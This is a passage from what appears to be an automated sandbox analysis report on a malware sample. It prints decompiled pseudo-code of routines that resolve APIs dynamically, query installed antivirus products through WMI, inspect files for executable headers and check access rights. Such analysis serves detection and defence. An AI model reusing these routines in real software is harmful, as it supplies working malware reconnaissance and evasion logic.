				_t12 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t12 ^ _t56;
				_t55 =  *0x29dd8098; // 0x15a1f98
				if(_t55 == 0) {
					L10:
					return E29DADF46(0, _t38, _v8 ^ _t56, _t49, _t54, _t55);
				} else {
					GetEnvironmentVariableA("PATH", 0x29dd9030, 0xffff);
					E29DB5640( &_v5008, 0, 0x1388);
					lstrcatA( &_v5008, 0x29dd9030);
					lstrcatA( &_v5008, ";");
					lstrcatA( &_v5008, _t55);
					SetEnvironmentVariableA("PATH",  &_v5008);
					_t49 =  &_v5008;
					E29DB5640( &_v5008, 0, 0x1388);
					_t25 =  *0x29dd8194; // 0x159c9f0
					_t26 = LoadLibraryA(_t25);
					 *0x29dd833c = _t26;
					if(_t26 != 0) {
						_t45 =  *0x29dd7d18; // 0x15a2670
						_t29 = GetProcAddress(_t26, _t45);
						_t51 =  *0x29dd80f8; // 0x15a24f0
						 *0x29dd8330 = _t29;
						_t30 =  *0x29dd833c; // 0x0
						_t31 = GetProcAddress(_t30, _t51);
						_t46 =  *0x29dd7c14; // 0x159c6d0
						_t52 =  *0x29dd833c; // 0x0
						 *0x29dd834c = _t31;
						_t32 = GetProcAddress(_t52, _t46);
						_t47 =  *0x29dd833c; // 0x0
						 *0x29dd82fc = _t32;
						_t33 =  *0x29dd7b4c; // 0x15a26b8
						_t34 = GetProcAddress(_t47, _t33);
						_t53 =  *0x29dd82ac; // 0x159c770
						 *0x29dd8324 = _t34;
						_t35 =  *0x29dd833c; // 0x0
						_t36 = GetProcAddress(_t35, _t53);
						_t48 =  *0x29dd7dc0; // 0x15a2400
						_t49 =  *0x29dd833c; // 0x0
						 *0x29dd8340 = _t36;
						 *0x29dd831c = GetProcAddress(_t49, _t48);
					}
					if( *0x29dd8330 == 0 ||  *0x29dd834c == 0 ||  *0x29dd82fc == 0 ||  *0x29dd8340 == 0 ||  *0x29dd831c == 0 ||  *0x29dd8324 == 0) {
						goto L10;
					} else {
						return E29DADF46(1, _t38, _v8 ^ _t56, _t49, _t54, _t55);
					}
				}
			}




























                                        0x29d9f960
                                        0x29d9f960
                                        0x29d9f968
                                        0x29d9f96d
                                        0x29d9f974
                                        0x29d9f978
                                        0x29d9f980
                                        0x29d9fafb
                                        0x29d9fb0b
                                        0x29d9f986
                                        0x29d9f995
                                        0x29d9f9a9
                                        0x29d9f9bd
                                        0x29d9f9cf
                                        0x29d9f9dd
                                        0x29d9f9ef
                                        0x29d9f9fa
                                        0x29d9fa03
                                        0x29d9fa08
                                        0x29d9fa11
                                        0x29d9fa17
                                        0x29d9fa1e
                                        0x29d9fa24
                                        0x29d9fa2c
                                        0x29d9fa32
                                        0x29d9fa38
                                        0x29d9fa3d
                                        0x29d9fa44
                                        0x29d9fa4a
                                        0x29d9fa50
                                        0x29d9fa58
                                        0x29d9fa5d
                                        0x29d9fa63
                                        0x29d9fa69
                                        0x29d9fa6e
                                        0x29d9fa75
                                        0x29d9fa7b
                                        0x29d9fa81
                                        0x29d9fa86
                                        0x29d9fa8d
                                        0x29d9fa93
                                        0x29d9fa99
                                        0x29d9faa1
                                        0x29d9faac
                                        0x29d9faac
                                        0x29d9fab8
                                        0x00000000
                                        0x29d9fae7
                                        0x29d9fafa
                                        0x29d9fafa
                                        0x29d9fab8

                                        APIs
                                        • GetEnvironmentVariableA.KERNEL32(PATH,29DD9030,0000FFFF,01596F20,?,29D9FC97), ref: 29D9F995
                                        • _memset.LIBCMT ref: 29D9F9A9
                                        • lstrcatA.KERNEL32(?,29DD9030,?,?,29D9FC97), ref: 29D9F9BD
                                        • lstrcatA.KERNEL32(?,29DCFA80,?,?,29D9FC97), ref: 29D9F9CF
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,29D9FC97), ref: 29D9F9DD
                                        • SetEnvironmentVariableA.KERNEL32(PATH,?,?,?,29D9FC97), ref: 29D9F9EF
                                        • _memset.LIBCMT ref: 29D9FA03
                                        • LoadLibraryA.KERNEL32(0159C9F0,?,?,?,?,?,29D9FC97), ref: 29D9FA11
                                        • GetProcAddress.KERNEL32(00000000,015A2670), ref: 29D9FA2C
                                        • GetProcAddress.KERNEL32(00000000,015A24F0), ref: 29D9FA44
                                        • GetProcAddress.KERNEL32(00000000,0159C6D0), ref: 29D9FA5D
                                        • GetProcAddress.KERNEL32(00000000,015A26B8), ref: 29D9FA75
                                        • GetProcAddress.KERNEL32(00000000,0159C770), ref: 29D9FA8D
                                        • GetProcAddress.KERNEL32(00000000,015A2400), ref: 29D9FAA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$lstrcat$EnvironmentVariable_memset$LibraryLoad
                                        • String ID: PATH
                                        • API String ID: 3772005587-1036084923
                                        • Opcode ID: 69a55b55cff43c20e66902d5b2039219018e7bfc8529b2a69a2735790f71a7d8
                                        • Instruction ID: 26a5cbb37ce826dfa9f2caa0af65dbcb6858f81d1603f8f242f1eb23b4cbba71
                                        • Opcode Fuzzy Hash: 69a55b55cff43c20e66902d5b2039219018e7bfc8529b2a69a2735790f71a7d8
                                        • Instruction Fuzzy Hash: D5414CB7590280ABD716FBA8E848EA537F8AF48B40F00C159F509D7640DB785906EBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA8210 Relevance: 22.6, APIs: 15, Instructions: 98libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E29DA8210() {
				CHAR* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				intOrPtr _t8;
				CHAR* _t9;
				_Unknown_base(*)()* _t10;
				struct HINSTANCE__* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t13;
				CHAR* _t14;
				_Unknown_base(*)()* _t15;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				_Unknown_base(*)()* _t18;
				CHAR* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				CHAR* _t24;
				CHAR* _t26;
				CHAR* _t27;
				intOrPtr _t28;
				struct HINSTANCE__* _t29;
				CHAR* _t30;
				struct HINSTANCE__* _t31;
				CHAR* _t32;
				struct HINSTANCE__* _t33;
				CHAR* _t34;
				struct HINSTANCE__* _t35;
				CHAR* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t38;
				CHAR* _t39;
				struct HINSTANCE__* _t40;
				CHAR* _t41;
				struct HINSTANCE__* _t42;
				CHAR* _t43;
				struct HINSTANCE__* _t44;
				void* _t45;

				_t1 =  *0x29dd7b74; // 0x159a540
				_t2 = LoadLibraryA(_t1);
				 *0x29dd856c = _t2;
				if(_t2 != 0) {
					_t27 =  *0x29dd7c58; // 0x159a6a8
					_t5 = GetProcAddress(_t2, _t27);
					_t37 =  *0x29dd7f0c; // 0x159a4f8
					 *0x29dd8514 = _t5;
					_t6 =  *0x29dd856c; // 0x74ab0000
					_t7 = GetProcAddress(_t6, _t37);
					_t28 =  *0x29dd821c; // 0x159a7e0
					_t38 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8474 = _t7;
					_t8 =  *_t7(_t38, _t28, _t45);
					_t29 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8520 = _t8;
					_t9 =  *0x29dd7da0; // 0x159e2c8
					_t10 = GetProcAddress(_t29, _t9);
					_t39 =  *0x29dd7ae4; // 0x159a6d8
					 *0x29dd8390 = _t10;
					_t11 =  *0x29dd856c; // 0x74ab0000
					_t12 = GetProcAddress(_t11, _t39);
					_t30 =  *0x29dd82c0; // 0x159a5d0
					_t40 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84bc = _t12;
					_t13 = GetProcAddress(_t40, _t30);
					_t31 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8484 = _t13;
					_t14 =  *0x29dd7c80; // 0x159caf0
					_t15 = GetProcAddress(_t31, _t14);
					_t41 =  *0x29dd7de0; // 0x159ca70
					 *0x29dd859c = _t15;
					_t16 =  *0x29dd856c; // 0x74ab0000
					_t17 = GetProcAddress(_t16, _t41);
					_t32 =  *0x29dd7ebc; // 0x159a768
					_t42 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd8554 = _t17;
					_t18 = GetProcAddress(_t42, _t32);
					_t33 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84cc = _t18;
					_t19 =  *0x29dd81d8; // 0x159a720
					_t20 = GetProcAddress(_t33, _t19);
					_t43 =  *0x29dd8060; // 0x159a678
					 *0x29dd83f4 = _t20;
					_t21 =  *0x29dd856c; // 0x74ab0000
					_t22 = GetProcAddress(_t21, _t43);
					_t34 =  *0x29dd7b58; // 0x159a528
					_t44 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84f4 = _t22;
					_t23 = GetProcAddress(_t44, _t34);
					_t35 =  *0x29dd856c; // 0x74ab0000
					 *0x29dd84c8 = _t23;
					_t24 =  *0x29dd8294; // 0x159cb70
					 *0x29dd84f8 = GetProcAddress(_t35, _t24);
				}
				_t36 =  *0x29dd8144; // 0x159a6c0
				_t3 = LoadLibraryA(_t36);
				 *0x29dd8358 = _t3;
				if(_t3 != 0) {
					_t26 =  *0x29dd8064; // 0x159a6f0
					_t4 = GetProcAddress(_t3, _t26);
					 *0x29dd844c = _t4;
					return _t4;
				}
				return _t3;
			}















































                                        0x29da8210
                                        0x29da8216
                                        0x29da821c
                                        0x29da8223
                                        0x29da8229
                                        0x29da8238
                                        0x29da823a
                                        0x29da8240
                                        0x29da8245
                                        0x29da824c
                                        0x29da824e
                                        0x29da8254
                                        0x29da825c
                                        0x29da8261
                                        0x29da8263
                                        0x29da8269
                                        0x29da826e
                                        0x29da8275
                                        0x29da827b
                                        0x29da8281
                                        0x29da8286
                                        0x29da828d
                                        0x29da8293
                                        0x29da8299
                                        0x29da82a1
                                        0x29da82a6
                                        0x29da82ac
                                        0x29da82b2
                                        0x29da82b7
                                        0x29da82be
                                        0x29da82c4
                                        0x29da82ca
                                        0x29da82cf
                                        0x29da82d6
                                        0x29da82dc
                                        0x29da82e2
                                        0x29da82ea
                                        0x29da82ef
                                        0x29da82f5
                                        0x29da82fb
                                        0x29da8300
                                        0x29da8307
                                        0x29da830d
                                        0x29da8313
                                        0x29da8318
                                        0x29da831f
                                        0x29da8325
                                        0x29da832b
                                        0x29da8333
                                        0x29da8338
                                        0x29da833e
                                        0x29da8344
                                        0x29da8349
                                        0x29da8356
                                        0x29da835b
                                        0x29da835c
                                        0x29da8363
                                        0x29da8369
                                        0x29da8370
                                        0x29da8372
                                        0x29da837a
                                        0x29da8380
                                        0x00000000
                                        0x29da8380
                                        0x29da8385

                                        APIs
                                        • LoadLibraryA.KERNEL32(0159A540,29D95175), ref: 29DA8216
                                        • GetProcAddress.KERNEL32(00000000,0159A6A8), ref: 29DA8238
                                        • GetProcAddress.KERNEL32(74AB0000,0159A4F8), ref: 29DA824C
                                        • GetProcAddress.KERNEL32(74AB0000,0159E2C8), ref: 29DA8275
                                        • GetProcAddress.KERNEL32(74AB0000,0159A6D8), ref: 29DA828D
                                        • GetProcAddress.KERNEL32(74AB0000,0159A5D0), ref: 29DA82A6
                                        • GetProcAddress.KERNEL32(74AB0000,0159CAF0), ref: 29DA82BE
                                        • GetProcAddress.KERNEL32(74AB0000,0159CA70), ref: 29DA82D6
                                        • GetProcAddress.KERNEL32(74AB0000,0159A768), ref: 29DA82EF
                                        • GetProcAddress.KERNEL32(74AB0000,0159A720), ref: 29DA8307
                                        • GetProcAddress.KERNEL32(74AB0000,0159A678), ref: 29DA831F
                                        • GetProcAddress.KERNEL32(74AB0000,0159A528), ref: 29DA8338
                                        • GetProcAddress.KERNEL32(74AB0000,0159CB70), ref: 29DA8350
                                        • LoadLibraryA.KERNEL32(0159A6C0), ref: 29DA8363
                                        • GetProcAddress.KERNEL32(00000000,0159A6F0), ref: 29DA837A
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID:
                                        • API String ID: 2238633743-0
                                        • Opcode ID: 23bcea2951dcc3af808f8edb4492ac873226bab1e7f543abdef844d8900604a1
                                        • Instruction ID: 39be5ee635575c55746822568c093d79a7c01908589a5eb477290d6894aa64f3
                                        • Opcode Fuzzy Hash: 23bcea2951dcc3af808f8edb4492ac873226bab1e7f543abdef844d8900604a1
                                        • Instruction Fuzzy Hash: 924142B7990281EFD746FFA5E949D2637BAE758B01710C659E906C3201DA3CA801EFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3FC0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000000,D9555F04,00000010,0000000F,00000000), ref: 29DA3FF8
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 29DA4009
                                        • CoCreateInstance.OLE32(29DC54F0,00000000,00000001,29DC5420,?), ref: 29DA4023
                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 29DA405C
                                        • VariantInit.OLEAUT32(?), ref: 29DA40CF
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000010,?), ref: 29DA491E
                                          • Part of subcall function 29DA48F0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,29DA410F,00000000,00000000), ref: 29DA494C
                                        • VariantClear.OLEAUT32(?), ref: 29DA4132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharInitializeMultiVariantWide$BlanketClearCreateInitInstanceProxySecurity
                                        • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                        • API String ID: 3162198753-2561087649
                                        • Opcode ID: 2948377d47030a17dbce403a0a5c2a40e12a86a9d10599e7f2187a083140ac1f
                                        • Instruction ID: e888d33b54d9d9b488435889589a3f2b6cde88d7cb6b3ab656991f2e8d15f172
                                        • Opcode Fuzzy Hash: 2948377d47030a17dbce403a0a5c2a40e12a86a9d10599e7f2187a083140ac1f
                                        • Instruction Fuzzy Hash: 74514CB1904249AFEB10DFA4DCC4EAEB77CFB58344F50826DF515AB681C6706D06DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DABC70 Relevance: 18.2, APIs: 12, Instructions: 212fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 90%
                                        			E29DABC70(long* __ecx, signed int __edx, void* _a4, signed int* _a8, intOrPtr* _a12) {
				signed int _v12;
				struct _SYSTEMTIME _v28;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				struct _BY_HANDLE_FILE_INFORMATION _v80;
				void _v84;
				long _v88;
				long _v92;
				struct _FILETIME _v100;
				void _v104;
				signed int* _v108;
				void _v112;
				long* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed char _t61;
				long _t62;
				signed int* _t63;
				long* _t64;
				intOrPtr _t75;
				long _t85;
				void _t89;
				void* _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				long _t96;
				signed int _t99;
				intOrPtr _t111;
				intOrPtr _t134;
				intOrPtr* _t136;
				signed int* _t137;
				void* _t138;
				signed int _t139;
				signed int _t140;

				_t121 = __edx;
				_t56 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t56 ^ _t140;
				_t138 = _a4;
				_t136 = _a12;
				_v108 = _a8;
				_v116 = __ecx;
				_v100.dwHighDateTime = __edx;
				if(GetFileInformationByHandle(_t138,  &_v80) != 0) {
					_t61 = _v80.dwFileAttributes;
					_t93 = 0;
					_t123 = _t61 & 0x00000001;
					if(_t123 != 0) {
						_t93 = 1;
					}
					if((_t61 & 0x00000002) != 0) {
						_t93 = _t93 | 0x00000002;
					}
					if((_t61 & 0x00000004) != 0) {
						_t93 = _t93 | 0x00000004;
					}
					_t99 = _t61 & 0x00000010;
					if(_t99 != 0) {
						_t93 = _t93 | 0x00000010;
					}
					if((_t61 & 0x00000020) != 0) {
						_t93 = _t93 | 0x00000020;
					}
					if(_t99 == 0) {
						_t94 = _t93 | 0x80000000;
					} else {
						_t94 = _t93 | 0x40000000;
					}
					_t95 = _t94 | 0x01000000;
					if(_t123 == 0) {
						_t95 = _t95 | 0x00800000;
					}
					_t62 = GetFileSize(_t138, 0);
					_v88 = _t62;
					if(_t62 > 0x28) {
						SetFilePointer(_t138, 0, 0, 0);
						ReadFile(_t138,  &_v84, 2,  &_v92, 0);
						SetFilePointer(_t138, 0x24, 0, 0);
						ReadFile(_t138,  &_v112, 4,  &_v92, 0);
						_t123 = 0x54ad;
						if(_v84 == 0x54ad) {
							_t85 = _v112;
							if(_v88 > _t85 + 0x34) {
								SetFilePointer(_t138, _t85, 0, 0);
								_t123 =  &_v92;
								ReadFile(_t138,  &_v104, 4,  &_v92, 0);
								_t89 = _v104;
								if(_t89 == 0x5a4d || _t89 == 0x454e || _t89 == 0x454c || _t89 == 0x4550) {
									_t95 = _t95 | 0x00400000;
								}
							}
						}
					}
					_t63 = _v108;
					if(_t63 != 0) {
						 *_t63 = _t95;
					}
					_t64 = _v116;
					if(_t64 != 0) {
						 *_t64 = _v88;
					}
					_t139 = _v56;
					_t96 = _v80.ftLastWriteTime;
					if(_t136 != 0) {
						_t134 = _v80.ftLastAccessTime - 0xd53e8000;
						asm("sbb eax, 0x19db1de");
						_t75 = E29DB75A0(_t134, _v64, 0x989680, 0);
						 *((intOrPtr*)(_t136 + 4)) = _t134;
						_t123 = _t139;
						asm("sbb edx, 0x19db1de");
						 *_t136 = _t75;
						 *((intOrPtr*)(_t136 + 8)) = E29DB75A0(_t96 - 0xd53e8000, _t123, 0x989680, 0);
						asm("sbb ecx, 0x19db1de");
						 *(_t136 + 0xc) = _t123;
						 *((intOrPtr*)(_t136 + 0x10)) = E29DB75A0(_v80.ftCreationTime - 0xd53e8000, _v72, 0x989680, 0);
						 *(_t136 + 0x14) = _t123;
					}
					_t137 = _v100.dwHighDateTime;
					if(_t137 != 0) {
						_v100.dwLowDateTime = _t96;
						_v100.dwHighDateTime = _t139;
						FileTimeToSystemTime( &_v100,  &_v28);
						_t111 = _v28.wSecond;
						_t123 = _t111 + _t111 & 0x0000001f;
						 *_t137 = ((_v28.wYear + 0xffffffc4 << 0x00000004 | _v28.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v28.wDay & 0x0000001f) << 0x00000010 | (_v28.wMinute & 0x0000003f | _v28.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _t111 + _t111 & 0x0000001f;
					}
					return E29DADF46(0, _t96, _v12 ^ _t140, _t123, _t137, _t139);
				} else {
					return E29DADF46(0x200, _t92, _v12 ^ _t140, _t121, _t136, _t138);
				}
			}









































                                        0x29dabc70
                                        0x29dabc76
                                        0x29dabc7d
                                        0x29dabc85
                                        0x29dabc89
                                        0x29dabc8c
                                        0x29dabc94
                                        0x29dabc97
                                        0x29dabca2
                                        0x29dabcba
                                        0x29dabcbf
                                        0x29dabcc1
                                        0x29dabcc4
                                        0x29dabcc6
                                        0x29dabcc6
                                        0x29dabccd
                                        0x29dabccf
                                        0x29dabccf
                                        0x29dabcd4
                                        0x29dabcd6
                                        0x29dabcd6
                                        0x29dabcdb
                                        0x29dabcde
                                        0x29dabce0
                                        0x29dabce0
                                        0x29dabce5
                                        0x29dabce7
                                        0x29dabce7
                                        0x29dabcec
                                        0x29dabcf6
                                        0x29dabcee
                                        0x29dabcee
                                        0x29dabcee
                                        0x29dabcfc
                                        0x29dabd04
                                        0x29dabd06
                                        0x29dabd06
                                        0x29dabd0f
                                        0x29dabd15
                                        0x29dabd1b
                                        0x29dabd28
                                        0x29dabd3b
                                        0x29dabd48
                                        0x29dabd5b
                                        0x29dabd61
                                        0x29dabd6a
                                        0x29dabd6c
                                        0x29dabd75
                                        0x29dabd7d
                                        0x29dabd85
                                        0x29dabd90
                                        0x29dabd96
                                        0x29dabd9e
                                        0x29dabdb5
                                        0x29dabdb5
                                        0x29dabd9e
                                        0x29dabd75
                                        0x29dabd6a
                                        0x29dabdbb
                                        0x29dabdc0
                                        0x29dabdc2
                                        0x29dabdc2
                                        0x29dabdc4
                                        0x29dabdc9
                                        0x29dabdce
                                        0x29dabdce
                                        0x29dabdd0
                                        0x29dabdd3
                                        0x29dabdd8
                                        0x29dabde2
                                        0x29dabded
                                        0x29dabdf4
                                        0x29dabdf9
                                        0x29dabe06
                                        0x29dabe0d
                                        0x29dabe15
                                        0x29dabe1f
                                        0x29dabe31
                                        0x29dabe39
                                        0x29dabe41
                                        0x29dabe44
                                        0x29dabe44
                                        0x29dabe47
                                        0x29dabe4c
                                        0x29dabe56
                                        0x29dabe59
                                        0x29dabe5c
                                        0x29dabe8f
                                        0x29dabea0
                                        0x29dabea5
                                        0x29dabea5
                                        0x29dabeb9
                                        0x29dabca4
                                        0x29dabcb9
                                        0x29dabcb9

                                        APIs
                                        • GetFileInformationByHandle.KERNEL32(?,?,?,?,?), ref: 29DABC9A
                                        • GetFileSize.KERNEL32(?,00000000), ref: 29DABD0F
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 29DABD28
                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 29DABD3B
                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 29DABD48
                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 29DABD5B
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 29DABD7D
                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 29DABD90
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$PointerRead$HandleInformationSize
                                        • String ID:
                                        • API String ID: 2979504256-0
                                        • Opcode ID: c72c45e71ef319caf1b5322ede8b4dddce4fc2be6e6d74857363f95da7ccc382
                                        • Instruction ID: 2f78d298f79a812af8e3184f81313ec35604e1e1090dfc6b242f92498bf77566
                                        • Opcode Fuzzy Hash: c72c45e71ef319caf1b5322ede8b4dddce4fc2be6e6d74857363f95da7ccc382
                                        • Instruction Fuzzy Hash: 8B716471A002146FEB08DFA4CC95FAEBBB5FF84700F10851DE616EB684D778A912DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8FFD0 Relevance: 18.1, APIs: 12, Instructions: 116COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E29D8FFD0(CHAR* __edi, long _a4) {
				signed int _v12;
				struct _GENERIC_MAPPING _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _PRIVILEGE_SET _v48;
				long _v52;
				void* _v56;
				void* _v60;
				int _v64;
				long _v68;
				long _v72;
				void* __ebx;
				void* __esi;
				signed int _t42;
				signed char _t64;
				struct _SECURITY_DESCRIPTOR* _t79;
				signed int _t80;

				_t78 = __edi;
				_t42 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t42 ^ _t80;
				_t64 = 0;
				_v52 = 0;
				if(GetFileSecurityA(__edi, 7, 0, 0,  &_v52) == 0 && GetLastError() == 0x7a) {
					_t79 = E29DADFE0(_t73, __edi, _t79, _v52);
					if(_t79 != 0) {
						_t73 =  &_v52;
						if(GetFileSecurityA(__edi, 7, _t79, _v52,  &_v52) != 0) {
							_v56 = 0;
							if(OpenProcessToken(GetCurrentProcess(), 0x2000e,  &_v56) != 0) {
								_v60 = 0;
								if(DuplicateToken(_v56, 2,  &_v60) != 0) {
									_v28.GenericWrite = 0;
									_v28.GenericExecute = 0;
									_v28.GenericAll = 0;
									_v48.PrivilegeCount = 0;
									_v48.Control = 0;
									_v48.Privilege = 0;
									_v36 = 0;
									_v32 = 0;
									_v68 = 0;
									_v72 = 0x14;
									_v64 = 0;
									_v28.GenericRead = 0x120089;
									_v28.GenericWrite = 0x120116;
									_v28.GenericExecute = 0x1200a0;
									_v28.GenericAll = 0x1f01ff;
									MapGenericMask( &_a4,  &_v28);
									if(AccessCheck(_t79, _v60, _a4,  &_v28,  &_v48,  &_v72,  &_v68,  &_v64) != 0) {
										_t64 = 0 | _v64 == 0x00000001;
									}
									CloseHandle(_v60);
								}
								_t73 = _v56;
								CloseHandle(_v56);
							}
							E29DADFA6(_t79);
						}
					}
				}
				return E29DADF46(_t64 & 0x000000ff, _t64, _v12 ^ _t80, _t73, _t78, _t79);
			}




















                                        0x29d8ffd0
                                        0x29d8ffd6
                                        0x29d8ffdd
                                        0x29d8ffe6
                                        0x29d8ffed
                                        0x29d8fff8
                                        0x29d90016
                                        0x29d9001d
                                        0x29d90026
                                        0x29d90037
                                        0x29d90046
                                        0x29d90058
                                        0x29d90068
                                        0x29d90073
                                        0x29d90082
                                        0x29d90085
                                        0x29d90088
                                        0x29d9008c
                                        0x29d9008f
                                        0x29d90092
                                        0x29d90095
                                        0x29d90098
                                        0x29d9009b
                                        0x29d9009e
                                        0x29d900a5
                                        0x29d900a8
                                        0x29d900af
                                        0x29d900b6
                                        0x29d900bd
                                        0x29d900c4
                                        0x29d900ef
                                        0x29d900f5
                                        0x29d900f5
                                        0x29d900fc
                                        0x29d900fc
                                        0x29d90102
                                        0x29d90106
                                        0x29d90106
                                        0x29d9010d
                                        0x29d90112
                                        0x29d90037
                                        0x29d9001d
                                        0x29d90127

                                        APIs
                                        • GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 29D8FFF0
                                        • GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 29D8FFFE
                                        • _malloc.LIBCMT ref: 29D90011
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 29D9002F
                                        • GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?), ref: 29D90049
                                        • OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?), ref: 29D90050
                                        • DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?), ref: 29D9006B
                                        • MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?), ref: 29D900C4
                                        • AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?), ref: 29D900E7
                                        • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D900FC
                                        • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D90106
                                        • _free.LIBCMT ref: 29D9010D
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandleProcessSecurityToken$AccessAllocateCheckCurrentDuplicateErrorGenericHeapLastMaskOpen_free_malloc
                                        • String ID:
                                        • API String ID: 1304225167-0
                                        • Opcode ID: 2ea3ad2a3dacac2498bde7f10ad4e2254cb3e0c71697bf2a2db0d8f0a74e2060
                                        • Instruction ID: d0e074c137ad244d6b7ceb70c54084cc4086f7a8b5dded5c28d4de97eba48926
                                        • Opcode Fuzzy Hash: 2ea3ad2a3dacac2498bde7f10ad4e2254cb3e0c71697bf2a2db0d8f0a74e2060
                                        • Instruction Fuzzy Hash: 4A4106B2D10249AFDB04EFA5E9859EEBBB8FF48744F00811DF505E7100EB749A05DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8DF30 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 358COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 91%
                                        			E29D8DF30(long __ecx, void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				char _v275;
				char _v276;
				char _v540;
				struct _FILETIME _v560;
				struct _FILETIME _v568;
				struct _FILETIME _v576;
				unsigned int _v580;
				char _v844;
				char _v845;
				signed int _v852;
				long _v856;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t108;
				intOrPtr _t111;
				signed int _t124;
				signed int* _t128;
				intOrPtr _t131;
				signed int _t134;
				signed int _t136;
				signed int _t139;
